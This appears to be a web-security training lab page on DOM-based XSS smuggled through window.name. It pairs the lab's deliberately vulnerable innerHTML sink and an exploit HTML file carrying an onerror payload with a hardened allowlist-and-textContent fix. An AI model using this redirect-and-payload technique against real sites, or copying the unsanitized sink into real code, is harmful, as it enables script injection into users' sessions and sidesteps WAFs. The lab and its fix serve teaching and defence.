Level 9: DOM Smuggling via window.name
MISSION: The application reads data from window.name. Because window.name persists across navigation, you must write an external HTML exploit that sets its own window.name and then redirects to this page.
No cached theme detected in window.name.
/// SOURCE CODE INSPECTOR ///
// Client-Side DOM Logic
// The application checks the window.name property for a cached session state.
// window.name persists across domains and cross-origin redirects!
window.onload = () => {
    let cachedState = window.name;
    if (cachedState && cachedState.includes("theme_")) {
        // Flaw: Renders the un-sanitized window.name directly to the DOM
        document.getElementById('theme-box').innerHTML = "Loaded theme: " + cachedState;
    }
};
/// DECRYPTION COMPLETE ///
The window.name property persists across different domains in the same tab. An attacker can set a malicious window.name on their own site and then redirect the victim to the vulnerable application; because the payload never appears in the URL or request body, URL-based WAFs are bypassed entirely.
Exploit HTML File:
<script>window.name = "theme_<img src=x onerror=alert(1)>";
window.location = "http://localhost:3000/level9";
</script>
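A hardened version of the consumer, added here as an example and not part of the lab's own code. The function names (readCachedTheme, applyCachedTheme) and the stand-in window and element objects are assumptions so the logic runs under Node without a DOM. The fix lives entirely in the page that reads window.name: only a strict allowlisted token is accepted, the value is rendered with textContent rather than innerHTML, and window.name is cleared once consumed so a tainted value does not follow the user to the next navigation. Modern browsers already clear window.name on cross-site top-level navigations, but same-site cross-origin navigations (for example a different port on the same host) still carry it, so the consumer must not trust it.

```javascript
// Added example (not the lab's code): a hardened consumer for window.name.
// Assumed names: readCachedTheme, applyCachedTheme, makeFakeWindow, makeFakeBox.

// Strict allowlist: the page only ever needs a short theme token, so anything
// that is not exactly that shape (including any markup) is rejected outright.
const THEME_TOKEN = /^theme_[a-z0-9_-]{1,32}$/;

function readCachedTheme(rawName) {
  if (typeof rawName !== "string") return null;
  return THEME_TOKEN.test(rawName) ? rawName : null;
}

// Render with textContent so the value is shown as text and never parsed as
// HTML, and clear window.name as soon as it has been read.
function applyCachedTheme(win, box) {
  const theme = readCachedTheme(win.name);
  win.name = ""; // consume: do not let the value persist to the next page
  if (theme === null) {
    box.textContent = "No cached theme detected in window.name.";
    return null;
  }
  box.textContent = "Loaded theme: " + theme;
  return theme;
}

// Constructed stand-ins for `window` and `#theme-box` so this runs under Node.
function makeFakeWindow(name) { return { name }; }
function makeFakeBox() { return { textContent: "" }; }

// Demo: the payload shape used in this level is rejected; a plain token passes.
const taintedWin = makeFakeWindow("theme_<img src=x onerror=alert(1)>");
const taintedBox = makeFakeBox();
applyCachedTheme(taintedWin, taintedBox);
console.log(taintedBox.textContent, "| window.name now:", JSON.stringify(taintedWin.name));

const okWin = makeFakeWindow("theme_dark");
const okBox = makeFakeBox();
console.log(applyCachedTheme(okWin, okBox), "|", okBox.textContent);

// In the real page this replaces the vulnerable onload handler:
// window.onload = () => applyCachedTheme(window, document.getElementById('theme-box'));
```

Even with the allowlist, textContent is kept as the rendering path: the allowlist is the policy, the non-parsing sink is the safety net if that policy is ever loosened.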